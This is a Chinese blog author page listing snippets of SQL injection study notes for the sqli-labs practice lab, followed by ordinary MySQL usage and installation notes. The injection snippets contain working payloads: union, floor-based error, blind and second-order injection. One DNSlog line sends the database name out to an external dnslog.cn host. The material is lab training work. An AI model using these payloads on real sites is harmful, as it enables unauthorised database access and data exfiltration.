![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
mysql
ihszg
四舍五入两米高,取整去余一百斤,平时找bug挖漏洞,闲时与学妹吟诗作赋,乏时以太极养精蓄锐。偶尔也为部分游戏的Beta测试出力。这就是我,展现在人前的我
展开
-
sql注入总结笔记
文章目录渗透千万条,安全第一条什么是SQLiSQLi危害SQLi分类如何发现SQLi?SQLi的利用步骤?MySQL注释符MySQL基础函数SQL基础语句更改记录URL编码MySQL联合查询注入优先级思路及步骤重点布尔盲注Payload构造思路延时盲注写文件读文件表单注入条件语句中or的认识测试注释步骤insert、update、delete注入报错注入模板原理1——薛定谔之报错注入原理2原理3例子其他模板LIKE注入宽字节注入条件原理dnslog带外查询数据MySQL注入绕过渗透千万条,安全第一条WA原创 2020-08-04 10:26:41 · 2295 阅读 · 0 评论 -
dnslog带出——sqli-labs第8关
得到一个随机的子域名库名http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\\\",database(),".uifm3e.dnslog.cn\\xxx.txt"))--+表名http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(table_name SEPARATOR'-') f.原创 2020-08-04 11:23:33 · 1665 阅读 · 1 评论 -
二次注入——sqli-labs第24关
首先,选择注册盲猜有个admin的账号,所以注册一个admin '#的账号。密码是12345(上帝视角)此时admin的密码是admin登录然后为admin '#修改密码为123修改成功(此时真的是修改admin '#的密码吗)(又一次上帝视角)此时admin的密码成了123,而admin '#的密码并没有重置这就是二次注入:原理就是php把……………………sql………………至于为什么会有...原创 2020-08-02 23:40:22 · 3622 阅读 · 1 评论 -
文件上传漏洞——sqli-labs第7关
条件:1.已知对应站点的绝对路径2.File_priv开关需要是打开状态select file_priv from mysql.user;3.secure_file_priv 不为null设置为空,对所有路径均可进行导入导出。设置为一个目录名字,只允许在该路径下导入导出。设置为Null,禁止所有导入导出。默认是NULL,可以通过my.conf文件mysqld一栏里进行配置,配置完成后,重启便会生效。在末尾加上:secure_file_priv=select @@gl原创 2020-07-28 20:16:33 · 2646 阅读 · 2 评论 -
表单注入——sqli-labs第11~16关
1、观察是post还是get可以看url的变化,或者看源码xxxx’ order by 10#’ order by 2#原创 2020-07-28 19:54:21 · 1766 阅读 · 0 评论 -
延时盲注——sqli-labs第9、10关
目录使用场景第9关确认场景判断闭合符找到数据库名的长度将数据库名一个字母一个字母爆出来…………第10关使用场景1.对时间函数敏感2.前端不显示后端报错和查询结果传来的结果,同时也不根据后端传来的结果显示不同的内容。一些资料说是:2.后端报错和查询结果不返回到前端,对前端其他任何输入都不返回给前端不同的内容至于是后端不返回,还是返回了前端不显示,有点搞不懂,希望有大佬看到能帮我扫盲基本函数:if(var1,var2,var3)var1:条件var2:条件为真时返回的值var3:条件为原创 2020-07-28 18:41:23 · 1765 阅读 · 3 评论 -
报错注入,布尔盲注——sqli-labs第五、六、八关
这里写目录标题第五关查询库名但是查询表名查询字段查询username、password字段的值第六关第五关这一关,当输入正确的id时,会输出 You are in……,而输入错误的则什么都没有,只有个welcome。当使用"闭合时,没问题当使用'时,提示SQL语法中有错误有sql语法错误,于是想到了报错注入(floor报错、updatexml报错、ExtractValue报错)这里用到了floor()报错:http://172.16.11.222/sqli-labs/Less-5/?id原创 2020-07-17 18:10:10 · 3295 阅读 · 0 评论 -
sqli-labs练习(第三、四关)
第三关由前面两关的经验,可以看出它是字符型然后"闭合,所以输入',但是报错说少了个).那就加上后面的步骤同第一关第四关第4关,同第3关,只不过闭合符是'单引号,所以换成",后面同第三关...原创 2020-07-17 15:36:28 · 1267 阅读 · 0 评论 -
sqli-labs练习(第二关)——数字型
1、先判断是字符型还是数字型。172.16.11.222/sqli-labs/Less-2/?id=1id=2-1 与 id=1的结果一样,说明是数字型。2、确认字段位数172.16.11.222/sqli-labs/Less-2/?id=1 order by 3一共3位3、确认占位信息172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+4、找库名http://172.16.11.222/sqli-labs/Less-原创 2020-07-17 15:12:30 · 1738 阅读 · 1 评论 -
sqli-labs练习(第一关)——字符型
目录1、判断是数字型还是字符型2、通过报错判断闭合符3、确认查询的字段数量4、确认占位信息5、找库名6、查表名7、找表字段8、找用户名和密码首先,进入靶场1、判断是数字型还是字符型在url后面分别添加?id=1, ?id=2, ?id=2-1 ,观察页面的变化,判断是字符型还是数字型。(如果id=2-1 与 id=1的页面一样,就是数字型;如果id=2-1与id=2的页面一样,就是字符型)http://172.16.11.222/sqli-labs/Less-1/?id=1发现它是字符型。原创 2020-07-17 13:13:33 · 1361 阅读 · 0 评论 -
自学sql注入(三)
这是笔者自行整理出来的有关sql注入的一些知识点,自己还有些迷迷糊糊,可能有些不对的地方。等学完之后,再来详写一系列的关于sql注入的文章基于floor的报错注入:1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#基于boolean的盲注Boolean是基于真假的判断(true or false);不管输入原创 2020-07-12 19:08:22 · 827 阅读 · 0 评论 -
自学sql注入(二)
这是笔者自行整理出来的有关sql注入的一些知识点,自己还有些迷迷糊糊,可能有些不对的地方。等学完之后,再来详写一系列的关于sql注入的文章文章目录基于union查询的注入group_concat用法sqlmap基础使用需要环境用法基于报错的注入基于union查询的注入1、首先利用数据库自带的表达式获取数据库名id=-1 union select 1,2,database()2、再利用表达式爆出表名:id=-1 union select 1,(select table_name from inf原创 2020-07-12 19:06:44 · 536 阅读 · 0 评论 -
自学sql注入(一)
== 这是笔者自行整理出来的有关sql注入的一些知识点,自己还有些迷迷糊糊,可能有些不对的地方。等学完之后,再来详写一系列的关于sql注入的文章==数据库MYSQL基础知识1、什么是库、表、列、键、值库:database,在数据库里面的数据的集合表:table,隶属于某个库,在数据库里面以表格形式存在列:column,表中竖着的内容行:row,表中横着的内容值:value,在表格中每个表格内的值键:key,值的一种形式,在整个表内是独一无二没有重复的,用来精确匹配对应的值表头:field,原创 2020-07-12 19:02:41 · 667 阅读 · 0 评论 -
mysql学习笔记
基本结果有 SELECT 子句,FROM 子句,WHERE 子句组成的查询块SELECT <字段名>FROM <表或视图名>WHERE <查询条件>SELECT命令语法:SELECT [ALL| DISTINCT] {*|table.*|[table.] field1 [as alias1] [,[table.] field2 [as alias2]][...]}FROM 表名 [] ,表2命令含义:从数据库表原创 2020-07-18 10:42:45 · 2416 阅读 · 9 评论 -
经典sql语句
一、基础1、说明:创建数据库CREATE DATABASE database-name 2、说明:删除数据库drop database dbname3、说明:备份sql server— 创建 备份数据的 deviceUSE masterEXEC sp_addumpdevice 'disk', 'testBack', 'c:\mssql7backup\MyNwind_1.dat'— 开始 备份BACKUP DATABASE pubs TO testBack 4、说明:创建新表c转载 2020-07-16 11:05:02 · 539 阅读 · 0 评论 -
如何导入mysql文件
一:未连接数据库1.创建一个数据库echo "create database w;" | mysql -uroot -p123456root是mysql的用户名,123456是密码2.导入数据库mysql -uroot -p123456 < /root/w.sql /root/w.sql 是w.sql在linux里面保存的路径3.登录mysql数据库mysql -uroot -p123456二:已连接数据库,此时的提示符为 mysql>1.创建一个数据库cr原创 2020-07-16 10:15:54 · 3311 阅读 · 0 评论 -
centos 7 里的mysql安装及授权远程登录
一、mysql安装鉴于下载速度实在太慢,这里采取本地安装包的方式安装1、先把安装包(文末有链接)上传到虚拟机(或者服务器)上2、安装yum localinstall mysql-community-* //yum localinstall,安装本地rpm包3、安装完之后,开启mysql服务systemctl start mysqld4、查询mysql服务的初始密码grep 'temporary password' /var/log/mysqld.log5、登录m原创 2020-07-15 15:36:36 · 2639 阅读 · 9 评论